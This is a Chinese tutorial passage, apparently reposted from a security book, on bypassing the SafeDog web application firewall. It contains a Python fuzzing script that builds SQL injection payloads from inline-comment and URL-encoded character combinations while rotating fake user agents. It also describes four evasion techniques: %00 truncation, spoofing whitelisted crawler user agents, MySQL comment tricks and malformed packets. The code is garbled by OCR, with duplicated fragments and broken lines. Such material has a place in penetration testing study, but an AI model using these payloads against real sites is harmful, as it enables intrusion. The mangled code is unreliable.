绕过安全狗优化

 

 

8.2节中,我们已经完成模糊测试绕过安全狗脚本,其中仅仅对数字进行了模 糊处理,如此已经能够产生许多绕过安全狗的方法,如果需要更多的绕过安全狗 方法,可在此脚本的基础上进行修改,完善此脚本。

完善的思路是从脚本本身的参数值和ua值进行增加,比如在原有ua的基础 上,列举多种ua进行迭代,然后对参数本身可以采用多重套用的方式:

 

def fuzzexp(url) :

fuzzing_x = [ '/* ', '*/ ', '/* ! ', '* ', '= ', '` ', ' ! ', '@ ', '% ', '+ ', ' | ', '%00 ']

fuzzing_y = [ ' ', ' ']

fuzzing_z = ["%0a", "%0b", "%0c", "%0d", "%0e", "%0f", "%0g", "%0i", "%0j"]

fuzz = fuzzing_x + fuzzing_y + fuzzing_z

ua = UserAgent()

headers = ua .firefox

for a in fuzz:

for b in fuzz:

for c in fuzz:

for d in fuzz:

exp = "/* !" + a + b + c + d + "and*/ 'a '= 'a--+"

 

'  '  ' '

-

. ,    ,

 

"%0h",

将fuzz的相关内联注释语句放入数组中:

 

fuzzing_x = [ '/* ', '*/ ', '/* !

'+ ', ' | ', '%00 ']

fuzzing_y = [ ' ', ' '

fuzzing_z = ["%0a", "%0b"

"%0i", "%0j"]

fuzz = fuzzing_x + fuzzing_y + fuzzing_z

'@ ', '% ', ' . ', '- ',

 

"%0f", "%0g", "%0h",

优化ua的随机化,可以使用fake-useragent实现:

ua = UserAgent()

headers = ua .firefox

将先前放入数组中的内联注释符号取出并拼接到一起:

for a in fuzz:

for b in fuzz:

for c in fuzz:

for d in fuzz:

exp = "/* !" + a + b + c + d + "and*/ 'a '= 'a--+"

如此便完成了脚本的基本优化,增加了更多的组合性,可以测试出更多绕过

 

 

 

 

 

安全狗的脚本。通过多种联合注释符号组合来有效地绕过安全狗,发挥组合的优 势,将更有可能成功。

常见的绕过安全狗的方式有4种:利用string绕过、利用user-agent绕过、利用 MySQL语法和html的特殊性绕过、利用畸形数据包绕过。下面分别介绍。

1.利用string的绕过

C语言在使用string等结构存储请求时,当进行解码时,%00会被识别替换为 NULL ,这样便导致了请求包的内容会被在构造后截断。例如:

str=1%00%20and%20a=a

当后端的校验存储使用了string等结构后,上述请求会被解析截断为str=1 ,从 而绕过监测。

2.利用user-agent绕过

在WAF应用程序进行防护的时候,一部分防护厂商会对某些user-agent进行特 殊放行,例如百度爬虫的user-agent 。测试时可以利用这部分特殊性绕过安全狗。

3.利用MySQL语法和HTML的特殊性绕过

利用MySQL的语法特性,“/*”和“*/” 中间的内容将会被视为注释而不进行操 作。例如,“9.0union”监测到参数为浮点数时语句结束,被当作空格执行。结合 HTML的写法,如url编码后的%20表示空格等思路进行绕过。

4.畸形数据包绕过

利用Apache对于HTTP数据包的兼容性以及对防护软件的不兼容性来绕过 WAF。

 

 

你可能感兴趣的:(笔记)